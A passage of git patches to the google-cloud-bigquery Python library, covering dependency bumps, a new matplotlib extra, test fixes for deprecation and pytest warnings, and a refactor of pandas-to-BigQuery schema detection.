if install_extras and session.python == UNIT_TEST_PYTHON_VERSIONS[0]: - install_target = ( - ".[bqstorage,pandas,ipywidgets,geopandas,tqdm,opentelemetry,bigquery_v2]" - ) + install_target = ".[bqstorage,pandas,ipywidgets,geopandas,matplotlib,tqdm,opentelemetry,bigquery_v2]" elif install_extras: # run against all other UNIT_TEST_PYTHON_VERSIONS install_target = ".[all]" else: diff --git a/pyproject.toml b/pyproject.toml index 38d74cdd0..9c91a2fc8 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -82,7 +82,11 @@ pandas = [ ipywidgets = ["ipywidgets >= 7.7.1", "ipykernel >= 6.2.0"] geopandas = ["geopandas >= 0.9.0, < 2.0.0", "Shapely >= 1.8.4, < 3.0.0"] ipython = ["ipython >= 7.23.1", "bigquery-magics >= 0.6.0"] -tqdm = ["tqdm >= 4.7.4, < 5.0.0"] +matplotlib = [ + "matplotlib >= 3.7.1, <= 3.9.2; python_version == '3.9'", + "matplotlib >= 3.10.3; python_version >= '3.10'", +] +tqdm = ["tqdm >= 4.23.4, < 5.0.0"] opentelemetry = [ "opentelemetry-api >= 1.1.0", "opentelemetry-sdk >= 1.1.0", @@ -93,7 +97,7 @@ bigquery_v2 = [ "protobuf >= 3.20.2, < 7.0.0, != 4.21.0, != 4.21.1, != 4.21.2, != 4.21.3, != 4.21.4, != 4.21.5", # For the legacy proto-based types. 
] all = [ - "google-cloud-bigquery[bqstorage,pandas,ipywidgets,geopandas,ipython,tqdm,opentelemetry,bigquery_v2]", + "google-cloud-bigquery[bqstorage,pandas,ipywidgets,geopandas,ipython,matplotlib,tqdm,opentelemetry,bigquery_v2]", ] [tool.setuptools.dynamic] diff --git a/testing/constraints-3.9.txt b/testing/constraints-3.9.txt index cb6c29f3b..60a155f0d 100644 --- a/testing/constraints-3.9.txt +++ b/testing/constraints-3.9.txt @@ -29,4 +29,4 @@ pyarrow==4.0.0 python-dateutil==2.8.2 requests==2.21.0 Shapely==1.8.4 -tqdm==4.7.4 +matplotlib==3.7.1 diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index 2cda59bd1..d82f0dfe3 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -22,6 +22,7 @@ from ..helpers import make_connection from .helpers import _make_client from .helpers import _make_job_resource +from google.cloud.bigquery.enums import DefaultPandasDTypes try: from google.cloud import bigquery_storage @@ -30,6 +31,7 @@ except (ImportError, AttributeError): bigquery_storage = None + try: import shapely except (ImportError, AttributeError): @@ -1019,5 +1021,9 @@ def test_query_job_to_geodataframe_delegation(wait_for_query): progress_bar_type=progress_bar_type, create_bqstorage_client=create_bqstorage_client, geography_column=geography_column, + bool_dtype=DefaultPandasDTypes.BOOL_DTYPE, + int_dtype=DefaultPandasDTypes.INT_DTYPE, + float_dtype=None, + string_dtype=None, ) assert df is row_iterator.to_geodataframe.return_value diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 253006547..8daa4ce43 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -31,6 +31,7 @@ from google.cloud.bigquery import exceptions from google.cloud.bigquery import external_config from google.cloud.bigquery import schema +from google.cloud.bigquery.enums import DefaultPandasDTypes from google.cloud.bigquery.table import TableReference from google.cloud.bigquery.dataset import 
DatasetReference @@ -4065,7 +4066,7 @@ def test_to_dataframe_no_tqdm(self): def test_to_dataframe_tqdm_error(self): pytest.importorskip("pandas") - pytest.importorskip("tqdm") + tqdm = pytest.importorskip("tqdm") mock.patch("tqdm.tqdm_gui", new=None) mock.patch("tqdm.notebook.tqdm", new=None) mock.patch("tqdm.tqdm", new=None) @@ -4100,7 +4101,7 @@ def test_to_dataframe_tqdm_error(self): for warning in warned: # pragma: NO COVER self.assertIn( warning.category, - [UserWarning, DeprecationWarning], + [UserWarning, DeprecationWarning, tqdm.TqdmExperimentalWarning], ) def test_to_dataframe_w_empty_results(self): @@ -5639,6 +5640,10 @@ def test_rowiterator_to_geodataframe_delegation(self, to_dataframe): progress_bar_type, create_bqstorage_client, geography_as_object=True, + bool_dtype=DefaultPandasDTypes.BOOL_DTYPE, + int_dtype=DefaultPandasDTypes.INT_DTYPE, + float_dtype=None, + string_dtype=None, ) self.assertIsInstance(df, geopandas.GeoDataFrame) diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index 94737732b..43d64d77d 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -261,3 +261,106 @@ def test_to_dataframe_with_jobs_query_response(class_under_test): "Tiffani", ] assert list(df["number"]) == [6, 325, 26, 10, 17, 22, 6, 229, 8] + + +@mock.patch("google.cloud.bigquery.table.geopandas") +def test_rowiterator_to_geodataframe_with_default_dtypes( + mock_geopandas, monkeypatch, class_under_test +): + mock_geopandas.GeoDataFrame = mock.Mock(spec=True) + mock_client = mock.create_autospec(bigquery.Client) + mock_client.project = "test-proj" + mock_api_request = mock.Mock() + schema = [ + bigquery.SchemaField("geo_col", "GEOGRAPHY"), + bigquery.SchemaField("bool_col", "BOOLEAN"), + bigquery.SchemaField("int_col", "INTEGER"), + bigquery.SchemaField("float_col", "FLOAT"), + bigquery.SchemaField("string_col", "STRING"), + ] + rows = class_under_test(mock_client, mock_api_request, TEST_PATH, schema) + + mock_df 
= pandas.DataFrame( + { + "geo_col": ["POINT (1 2)"], + "bool_col": [True], + "int_col": [123], + "float_col": [1.23], + "string_col": ["abc"], + } + ) + rows.to_dataframe = mock.Mock(return_value=mock_df) + + rows.to_geodataframe(geography_column="geo_col") + + rows.to_dataframe.assert_called_once_with( + None, # bqstorage_client + None, # dtypes + None, # progress_bar_type + True, # create_bqstorage_client + geography_as_object=True, + bool_dtype=bigquery.enums.DefaultPandasDTypes.BOOL_DTYPE, + int_dtype=bigquery.enums.DefaultPandasDTypes.INT_DTYPE, + float_dtype=None, + string_dtype=None, + ) + mock_geopandas.GeoDataFrame.assert_called_once_with( + mock_df, crs="EPSG:4326", geometry="geo_col" + ) + + +@mock.patch("google.cloud.bigquery.table.geopandas") +def test_rowiterator_to_geodataframe_with_custom_dtypes( + mock_geopandas, monkeypatch, class_under_test +): + mock_geopandas.GeoDataFrame = mock.Mock(spec=True) + mock_client = mock.create_autospec(bigquery.Client) + mock_client.project = "test-proj" + mock_api_request = mock.Mock() + schema = [ + bigquery.SchemaField("geo_col", "GEOGRAPHY"), + bigquery.SchemaField("bool_col", "BOOLEAN"), + bigquery.SchemaField("int_col", "INTEGER"), + bigquery.SchemaField("float_col", "FLOAT"), + bigquery.SchemaField("string_col", "STRING"), + ] + rows = class_under_test(mock_client, mock_api_request, TEST_PATH, schema) + + mock_df = pandas.DataFrame( + { + "geo_col": ["POINT (3 4)"], + "bool_col": [False], + "int_col": [456], + "float_col": [4.56], + "string_col": ["def"], + } + ) + rows.to_dataframe = mock.Mock(return_value=mock_df) + + custom_bool_dtype = "bool" + custom_int_dtype = "int32" + custom_float_dtype = "float32" + custom_string_dtype = "string" + + rows.to_geodataframe( + geography_column="geo_col", + bool_dtype=custom_bool_dtype, + int_dtype=custom_int_dtype, + float_dtype=custom_float_dtype, + string_dtype=custom_string_dtype, + ) + + rows.to_dataframe.assert_called_once_with( + None, # bqstorage_client + None, 
# dtypes + None, # progress_bar_type + True, # create_bqstorage_client + geography_as_object=True, + bool_dtype=custom_bool_dtype, + int_dtype=custom_int_dtype, + float_dtype=custom_float_dtype, + string_dtype=custom_string_dtype, + ) + mock_geopandas.GeoDataFrame.assert_called_once_with( + mock_df, crs="EPSG:4326", geometry="geo_col" + ) From 2140a51bac95ab600759bdee576cf3a41c7dc834 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 14 May 2025 13:59:44 -0400 Subject: [PATCH 101/202] chore: Fix two types of warnings in unit tests (#2183) * Fix two types of warnings in unit tests This commit addresses two warnings that appear when running unit tests: 1. `PytestRemovedIn9Warning` in `tests/unit/test_opentelemetry_tracing.py`: Removed a `@pytest.mark.skipif` decorator from a fixture. The skip condition is already present on the test methods using the fixture. 2. `FutureWarning` in `tests/unit/test_client.py`: Updated calls to `client.query()` to include `job_retry=None` when `job_id` is also specified. This is to avoid ambiguity as BigQuery cannot retry a failed job with the exact same ID. 
* Update tests/unit/test_client.py * Update tests/unit/test_client.py * Update linting * adds more examples of functions where job_retry is needed --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- tests/unit/test_client.py | 52 ++++++++++++++++++------ tests/unit/test_opentelemetry_tracing.py | 1 - 2 files changed, 39 insertions(+), 14 deletions(-) diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index b8140df66..a35338698 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -4719,7 +4719,7 @@ def test_query_w_api_method_query_and_job_id_fails(self): client._connection = make_connection({}) with self.assertRaises(TypeError) as exc: - client.query(query, job_id="abcd", api_method="QUERY") + client.query(query, job_id="abcd", api_method="QUERY", job_retry=None) self.assertIn( "`job_id` was provided, but the 'QUERY' `api_method` was requested", exc.exception.args[0], @@ -4774,7 +4774,11 @@ def test_query_w_explicit_project(self): conn = client._connection = make_connection(resource) client.query( - query, job_id=job_id, project="other-project", location=self.LOCATION + query, + job_id=job_id, + project="other-project", + location=self.LOCATION, + job_retry=None, ) # Check that query actually starts the job. @@ -4833,7 +4837,11 @@ def test_query_w_explicit_job_config(self): original_config_copy = copy.deepcopy(job_config) client.query( - query, job_id=job_id, location=self.LOCATION, job_config=job_config + query, + job_id=job_id, + location=self.LOCATION, + job_config=job_config, + job_retry=None, ) # Check that query actually starts the job. 
@@ -4884,7 +4892,11 @@ def test_query_preserving_explicit_job_config(self): original_config_copy = copy.deepcopy(job_config) client.query( - query, job_id=job_id, location=self.LOCATION, job_config=job_config + query, + job_id=job_id, + location=self.LOCATION, + job_config=job_config, + job_retry=None, ) # Check that query actually starts the job. @@ -4940,7 +4952,13 @@ def test_query_preserving_explicit_default_job_config(self): ) conn = client._connection = make_connection(resource) - client.query(query, job_id=job_id, location=self.LOCATION, job_config=None) + client.query( + query, + job_id=job_id, + location=self.LOCATION, + job_config=None, + job_retry=None, + ) # Check that query actually starts the job. conn.api_request.assert_called_once_with( @@ -4978,7 +4996,11 @@ def test_query_w_invalid_job_config(self): with self.assertRaises(TypeError) as exc: client.query( - query, job_id=job_id, location=self.LOCATION, job_config=job_config + query, + job_id=job_id, + location=self.LOCATION, + job_config=job_config, + job_retry=None, ) self.assertIn("Expected an instance of QueryJobConfig", exc.exception.args[0]) @@ -5027,7 +5049,11 @@ def test_query_w_explicit_job_config_override(self): job_config.default_dataset = None client.query( - query, job_id=job_id, location=self.LOCATION, job_config=job_config + query, + job_id=job_id, + location=self.LOCATION, + job_config=job_config, + job_retry=None, ) # Check that query actually starts the job. @@ -5072,7 +5098,7 @@ def test_query_w_client_default_config_no_incoming(self): ) conn = client._connection = make_connection(resource) - client.query(query, job_id=job_id, location=self.LOCATION) + client.query(query, job_id=job_id, location=self.LOCATION, job_retry=None) # Check that query actually starts the job. 
conn.api_request.assert_called_once_with( @@ -5114,7 +5140,7 @@ def test_query_w_client_location(self): ) conn = client._connection = make_connection(resource) - client.query(query, job_id=job_id, project="other-project") + client.query(query, job_id=job_id, project="other-project", job_retry=None) # Check that query actually starts the job. conn.api_request.assert_called_once_with( @@ -5178,7 +5204,7 @@ def test_query_w_udf_resources(self): config.udf_resources = udf_resources config.use_legacy_sql = True - job = client.query(QUERY, job_config=config, job_id=JOB) + job = client.query(QUERY, job_config=config, job_id=JOB, job_retry=None) self.assertIsInstance(job, QueryJob) self.assertIs(job._client, client) @@ -5234,7 +5260,7 @@ def test_query_w_query_parameters(self): config = QueryJobConfig() config.query_parameters = query_parameters - job = client.query(QUERY, job_config=config, job_id=JOB) + job = client.query(QUERY, job_config=config, job_id=JOB, job_retry=None) self.assertIsInstance(job, QueryJob) self.assertIs(job._client, client) @@ -5277,7 +5303,7 @@ def test_query_job_rpc_fail_w_random_error(self): ) with job_begin_patcher: with pytest.raises(Unknown, match="Not sure what went wrong."): - client.query("SELECT 1;", job_id="123") + client.query("SELECT 1;", job_id="123", job_retry=None) def test_query_job_rpc_fail_w_conflict_job_id_given(self): from google.api_core.exceptions import Conflict @@ -5293,7 +5319,7 @@ def test_query_job_rpc_fail_w_conflict_job_id_given(self): ) with job_begin_patcher: with pytest.raises(Conflict, match="Job already exists."): - client.query("SELECT 1;", job_id="123") + client.query("SELECT 1;", job_id="123", job_retry=None) def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_fails(self): from google.api_core.exceptions import Conflict diff --git a/tests/unit/test_opentelemetry_tracing.py b/tests/unit/test_opentelemetry_tracing.py index 546cc02bd..57132a1b9 100644 --- a/tests/unit/test_opentelemetry_tracing.py +++ 
b/tests/unit/test_opentelemetry_tracing.py @@ -42,7 +42,6 @@ TEST_SPAN_ATTRIBUTES = {"foo": "baz"} -@pytest.mark.skipif(opentelemetry is None, reason="Require `opentelemetry`") @pytest.fixture def setup(): importlib.reload(opentelemetry_tracing) From 110ad603cf61566c3421e26a028d897135e526d3 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 14 May 2025 20:42:29 +0200 Subject: [PATCH 102/202] chore(deps): update all dependencies to v3.32.0 (#2179) Co-authored-by: Chalmer Lowe --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 2 +- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- samples/snippets/requirements.txt | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index b98f4ace9..743d0fe35 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.31.0 +google-cloud-bigquery==3.32.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 3ff1b2944..434a594cb 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -12,7 +12,7 @@ geojson==3.2.0 geopandas==1.0.1 google-api-core==2.24.2 google-auth==2.40.1 -google-cloud-bigquery==3.31.0 +google-cloud-bigquery==3.32.0 google-cloud-bigquery-storage==2.31.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index b000aa50c..bb60f2a67 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.9.0 db-dtypes==1.4.3 -google.cloud.bigquery==3.31.0 +google.cloud.bigquery==3.32.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1 pandas==2.2.3 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index d80ffcd09..17f43bf78 100644 --- 
a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,6 +1,6 @@ bigquery-magics==0.9.0 db-dtypes==1.4.3 -google-cloud-bigquery==3.31.0 +google-cloud-bigquery==3.32.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1; python_version == '3.9' ipython==9.2.0; python_version >= '3.10' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 4b88c6b70..c31815d69 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.31.0 +google-cloud-bigquery==3.32.0 From 5805066d9dfb696e7f514569567a5432ee98ad2b Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 15 May 2025 05:11:00 -0400 Subject: [PATCH 103/202] refactor: Fix DeprecationWarnings for datetime methods in job tests (#2185) * Fix DeprecationWarnings for datetime methods in job tests Replaced calls to deprecated `datetime.datetime.utcnow()` with `datetime.datetime.now(datetime.UTC)` in `tests/unit/job/test_base.py`. Replaced calls to deprecated `datetime.datetime.utcfromtimestamp()` with `datetime.datetime.fromtimestamp(timestamp, datetime.UTC)` in `tests/unit/job/helpers.py`. These changes address the specific warnings identified in the issue for these two files. 
* Update tests/unit/job/test_base.py * Update tests/unit/job/test_base.py * Updates datetime code related to UTC --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- tests/unit/job/helpers.py | 4 +++- tests/unit/job/test_base.py | 2 +- tests/unit/test__pandas_helpers.py | 2 +- tests/unit/test_client.py | 17 ++++++++--------- tests/unit/test_dataset.py | 4 +++- tests/unit/test_query.py | 17 +++++++++-------- tests/unit/test_table.py | 8 ++++++-- 7 files changed, 31 insertions(+), 23 deletions(-) diff --git a/tests/unit/job/helpers.py b/tests/unit/job/helpers.py index 3642c7229..24ba2fa99 100644 --- a/tests/unit/job/helpers.py +++ b/tests/unit/job/helpers.py @@ -106,7 +106,9 @@ def _setUpConstants(self): from google.cloud._helpers import UTC self.WHEN_TS = 1437767599.006 - self.WHEN = datetime.datetime.utcfromtimestamp(self.WHEN_TS).replace(tzinfo=UTC) + self.WHEN = datetime.datetime.fromtimestamp(self.WHEN_TS, UTC).replace( + tzinfo=UTC + ) self.ETAG = "ETAG" self.FULL_JOB_ID = "%s:%s" % (self.PROJECT, self.JOB_ID) self.RESOURCE_URL = "{}/bigquery/v2/projects/{}/jobs/{}".format( diff --git a/tests/unit/job/test_base.py b/tests/unit/job/test_base.py index 2d2f0c13c..22a0fa450 100644 --- a/tests/unit/job/test_base.py +++ b/tests/unit/job/test_base.py @@ -331,7 +331,7 @@ def _datetime_and_millis(): import datetime from google.cloud._helpers import _millis - now = datetime.datetime.utcnow().replace( + now = datetime.datetime.now(datetime.timezone.utc).replace( microsecond=123000, tzinfo=datetime.timezone.utc, # stats timestamps have ms precision ) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index 48c085c1d..d6ea5df7e 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -886,7 +886,7 @@ def test_list_columns_and_indexes_with_named_index_same_as_column_name( @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def 
test_dataframe_to_json_generator(module_under_test): - utcnow = datetime.datetime.utcnow() + utcnow = datetime.datetime.now(datetime.timezone.utc) dataframe = pandas.DataFrame( { "a_series": [1, 2, 3, 4], diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index a35338698..468068321 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -5853,7 +5853,7 @@ def test_insert_rows_w_schema(self): from google.cloud.bigquery.schema import SchemaField WHEN_TS = 1437767599.006 - WHEN = datetime.datetime.utcfromtimestamp(WHEN_TS).replace(tzinfo=UTC) + WHEN = datetime.datetime.fromtimestamp(WHEN_TS, UTC).replace(tzinfo=UTC) PATH = "projects/%s/datasets/%s/tables/%s/insertAll" % ( self.PROJECT, self.DS_ID, @@ -5914,7 +5914,7 @@ def test_insert_rows_w_list_of_dictionaries(self): from google.cloud.bigquery.table import Table WHEN_TS = 1437767599.006 - WHEN = datetime.datetime.utcfromtimestamp(WHEN_TS).replace(tzinfo=UTC) + WHEN = datetime.datetime.fromtimestamp(WHEN_TS, UTC).replace(tzinfo=UTC) PATH = "projects/%s/datasets/%s/tables/%s/insertAll" % ( self.PROJECT, self.DS_ID, @@ -6097,6 +6097,7 @@ def _row_data(row): ) def test_insert_rows_w_repeated_fields(self): + from google.cloud._helpers import UTC from google.cloud.bigquery.schema import SchemaField from google.cloud.bigquery.table import Table @@ -6126,12 +6127,8 @@ def test_insert_rows_w_repeated_fields(self): ( 12, [ - datetime.datetime( - 2018, 12, 1, 12, 0, 0, tzinfo=datetime.timezone.utc - ), - datetime.datetime( - 2018, 12, 1, 13, 0, 0, tzinfo=datetime.timezone.utc - ), + datetime.datetime(2018, 12, 1, 12, 0, 0, tzinfo=UTC), + datetime.datetime(2018, 12, 1, 13, 0, 0, tzinfo=UTC), ], [1.25, 2.5], ), @@ -6966,7 +6963,9 @@ def test_list_rows(self): ) WHEN_TS = 1437767599006000 - WHEN = datetime.datetime.utcfromtimestamp(WHEN_TS / 1e6).replace(tzinfo=UTC) + WHEN = datetime.datetime.fromtimestamp( + WHEN_TS / 1e6, datetime.timezone.utc + ).replace(tzinfo=UTC) WHEN_1 = WHEN + 
datetime.timedelta(microseconds=1) WHEN_2 = WHEN + datetime.timedelta(microseconds=2) ROWS = 1234 diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 5cce2a9a7..3fd2579af 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -945,7 +945,9 @@ def _setUpConstants(self): from google.cloud._helpers import UTC self.WHEN_TS = 1437767599.006 - self.WHEN = datetime.datetime.utcfromtimestamp(self.WHEN_TS).replace(tzinfo=UTC) + self.WHEN = datetime.datetime.fromtimestamp(self.WHEN_TS, UTC).replace( + tzinfo=UTC + ) self.ETAG = "ETAG" self.DS_FULL_ID = "%s:%s" % (self.PROJECT, self.DS_ID) self.RESOURCE_URL = "http://example.com/path/to/resource" diff --git a/tests/unit/test_query.py b/tests/unit/test_query.py index 40ef080f7..0d967bdb8 100644 --- a/tests/unit/test_query.py +++ b/tests/unit/test_query.py @@ -637,9 +637,9 @@ def test_to_api_repr_w_timestamp_datetime(self): self.assertEqual(param.to_api_repr(), EXPECTED) def test_to_api_repr_w_timestamp_micros(self): - from google.cloud._helpers import _microseconds_from_datetime + from google.cloud._helpers import _microseconds_from_datetime, UTC - now = datetime.datetime.utcnow() + now = datetime.datetime.now(UTC) seconds = _microseconds_from_datetime(now) / 1.0e6 EXPECTED = { "parameterType": {"type": "TIMESTAMP"}, @@ -650,9 +650,9 @@ def test_to_api_repr_w_timestamp_micros(self): self.assertEqual(param.to_api_repr(), EXPECTED) def test_to_api_repr_w_datetime_datetime(self): - from google.cloud._helpers import _datetime_to_rfc3339 + from google.cloud._helpers import _datetime_to_rfc3339, UTC - now = datetime.datetime.utcnow() + now = datetime.datetime.now(UTC) EXPECTED = { "parameterType": {"type": "DATETIME"}, "parameterValue": { @@ -664,9 +664,9 @@ def test_to_api_repr_w_datetime_datetime(self): self.assertEqual(param.to_api_repr(), EXPECTED) def test_to_api_repr_w_datetime_string(self): - from google.cloud._helpers import _datetime_to_rfc3339 + from google.cloud._helpers import 
_datetime_to_rfc3339, UTC - now = datetime.datetime.utcnow() + now = datetime.datetime.now(UTC) now_str = _datetime_to_rfc3339(now) EXPECTED = { "parameterType": {"type": "DATETIME"}, @@ -1047,9 +1047,10 @@ def test_to_api_repr_w_datetime_str(self): self.assertEqual(param.to_api_repr(), EXPECTED) def test_to_api_repr_w_datetime_datetime(self): + from google.cloud._helpers import UTC # type: ignore from google.cloud.bigquery._helpers import _RFC3339_MICROS_NO_ZULU - now = datetime.datetime.utcnow() + now = datetime.datetime.now(UTC) now_str = now.strftime(_RFC3339_MICROS_NO_ZULU) EXPECTED = { "parameterType": { @@ -1089,7 +1090,7 @@ def test_to_api_repr_w_timestamp_str(self): def test_to_api_repr_w_timestamp_timestamp(self): from google.cloud._helpers import UTC # type: ignore - now = datetime.datetime.utcnow() + now = datetime.datetime.now(UTC) now = now.astimezone(UTC) now_str = str(now) EXPECTED = { diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 8daa4ce43..92fa0e2ec 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -395,7 +395,9 @@ def _setUpConstants(self): from google.cloud._helpers import UTC self.WHEN_TS = 1437767599.006 - self.WHEN = datetime.datetime.utcfromtimestamp(self.WHEN_TS).replace(tzinfo=UTC) + self.WHEN = datetime.datetime.fromtimestamp(self.WHEN_TS, UTC).replace( + tzinfo=UTC + ) self.ETAG = "ETAG" self.TABLE_FULL_ID = "%s:%s.%s" % (self.PROJECT, self.DS_ID, self.TABLE_NAME) self.RESOURCE_URL = "http://example.com/path/to/resource" @@ -1952,7 +1954,9 @@ def _setUpConstants(self): from google.cloud._helpers import UTC self.WHEN_TS = 1437767599.125 - self.WHEN = datetime.datetime.utcfromtimestamp(self.WHEN_TS).replace(tzinfo=UTC) + self.WHEN = datetime.datetime.fromtimestamp(self.WHEN_TS, UTC).replace( + tzinfo=UTC + ) self.EXP_TIME = datetime.datetime(2015, 8, 1, 23, 59, 59, tzinfo=UTC) def test_ctor(self): From 7ec2848379d5743bbcb36700a1153540c451e0e0 Mon Sep 17 00:00:00 2001 From: Chelsea Lin Date: 
Mon, 19 May 2025 10:52:16 -0700 Subject: [PATCH 104/202] fix: ensure SchemaField.field_dtype returns a string (#2188) * fix: ensure SchemaField.field_dtype returns a string * fix cover tests * fix unit 3.9 --- google/cloud/bigquery/_pandas_helpers.py | 154 ++++++++++------------- google/cloud/bigquery/schema.py | 28 ++--- tests/unit/test__pandas_helpers.py | 113 ++++++----------- tests/unit/test_schema.py | 5 - 4 files changed, 113 insertions(+), 187 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 457eb9078..6691e7ef6 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -508,31 +508,37 @@ def dataframe_to_bq_schema(dataframe, bq_schema): bq_schema_unused = set() bq_schema_out = [] - unknown_type_fields = [] - + unknown_type_columns = [] + dataframe_reset_index = dataframe.reset_index() for column, dtype in list_columns_and_indexes(dataframe): - # Use provided type from schema, if present. + # Step 1: use provided type from schema, if present. bq_field = bq_schema_index.get(column) if bq_field: bq_schema_out.append(bq_field) bq_schema_unused.discard(bq_field.name) continue - # Otherwise, try to automatically determine the type based on the + # Step 2: try to automatically determine the type based on the # pandas dtype. 
bq_type = _PANDAS_DTYPE_TO_BQ.get(dtype.name) if bq_type is None: - sample_data = _first_valid(dataframe.reset_index()[column]) + sample_data = _first_valid(dataframe_reset_index[column]) if ( isinstance(sample_data, _BaseGeometry) and sample_data is not None # Paranoia ): bq_type = "GEOGRAPHY" - bq_field = schema.SchemaField(column, bq_type) - bq_schema_out.append(bq_field) + if bq_type is not None: + bq_schema_out.append(schema.SchemaField(column, bq_type)) + continue + + # Step 3: try with pyarrow if available + bq_field = _get_schema_by_pyarrow(column, dataframe_reset_index[column]) + if bq_field is not None: + bq_schema_out.append(bq_field) + continue - if bq_field.field_type is None: - unknown_type_fields.append(bq_field) + unknown_type_columns.append(column) # Catch any schema mismatch. The developer explicitly asked to serialize a # column, but it was not found. @@ -543,98 +549,70 @@ def dataframe_to_bq_schema(dataframe, bq_schema): ) ) - # If schema detection was not successful for all columns, also try with - # pyarrow, if available. - if unknown_type_fields: - if not pyarrow: - msg = "Could not determine the type of columns: {}".format( - ", ".join(field.name for field in unknown_type_fields) - ) - warnings.warn(msg) - return None # We cannot detect the schema in full. - - # The augment_schema() helper itself will also issue unknown type - # warnings if detection still fails for any of the fields. - bq_schema_out = augment_schema(dataframe, bq_schema_out) + if unknown_type_columns != []: + msg = "Could not determine the type of columns: {}".format( + ", ".join(unknown_type_columns) + ) + warnings.warn(msg) + return None # We cannot detect the schema in full. - return tuple(bq_schema_out) if bq_schema_out else None + return tuple(bq_schema_out) -def augment_schema(dataframe, current_bq_schema): - """Try to deduce the unknown field types and return an improved schema. 
+def _get_schema_by_pyarrow(name, series): + """Attempt to detect the type of the given series by leveraging PyArrow's + type detection capabilities. - This function requires ``pyarrow`` to run. If all the missing types still - cannot be detected, ``None`` is returned. If all types are already known, - a shallow copy of the given schema is returned. + This function requires the ``pyarrow`` library to be installed and + available. If the series type cannot be determined or ``pyarrow`` is not + available, ``None`` is returned. Args: - dataframe (pandas.DataFrame): - DataFrame for which some of the field types are still unknown. - current_bq_schema (Sequence[google.cloud.bigquery.schema.SchemaField]): - A BigQuery schema for ``dataframe``. The types of some or all of - the fields may be ``None``. + name (str): + the column name of the SchemaField. + series (pandas.Series): + The Series data for which to detect the data type. Returns: - Optional[Sequence[google.cloud.bigquery.schema.SchemaField]] + Optional[google.cloud.bigquery.schema.SchemaField]: + A tuple containing the BigQuery-compatible type string (e.g., + "STRING", "INTEGER", "TIMESTAMP", "DATETIME", "NUMERIC", "BIGNUMERIC") + and the mode string ("NULLABLE", "REPEATED"). + Returns ``None`` if the type cannot be determined or ``pyarrow`` + is not imported. """ - # pytype: disable=attribute-error - augmented_schema = [] - unknown_type_fields = [] - for field in current_bq_schema: - if field.field_type is not None: - augmented_schema.append(field) - continue - - arrow_table = pyarrow.array(dataframe.reset_index()[field.name]) - - if pyarrow.types.is_list(arrow_table.type): - # `pyarrow.ListType` - detected_mode = "REPEATED" - detected_type = _pyarrow_helpers.arrow_scalar_ids_to_bq( - arrow_table.values.type.id - ) - - # For timezone-naive datetimes, pyarrow assumes the UTC timezone and adds - # it to such datetimes, causing them to be recognized as TIMESTAMP type. 
- # We thus additionally check the actual data to see if we need to overrule - # that and choose DATETIME instead. - # Note that this should only be needed for datetime values inside a list, - # since scalar datetime values have a proper Pandas dtype that allows - # distinguishing between timezone-naive and timezone-aware values before - # even requiring the additional schema augment logic in this method. - if detected_type == "TIMESTAMP": - valid_item = _first_array_valid(dataframe[field.name]) - if isinstance(valid_item, datetime) and valid_item.tzinfo is None: - detected_type = "DATETIME" - else: - detected_mode = field.mode - detected_type = _pyarrow_helpers.arrow_scalar_ids_to_bq(arrow_table.type.id) - if detected_type == "NUMERIC" and arrow_table.type.scale > 9: - detected_type = "BIGNUMERIC" - if detected_type is None: - unknown_type_fields.append(field) - continue + if not pyarrow: + return None - new_field = schema.SchemaField( - name=field.name, - field_type=detected_type, - mode=detected_mode, - description=field.description, - fields=field.fields, - ) - augmented_schema.append(new_field) + arrow_table = 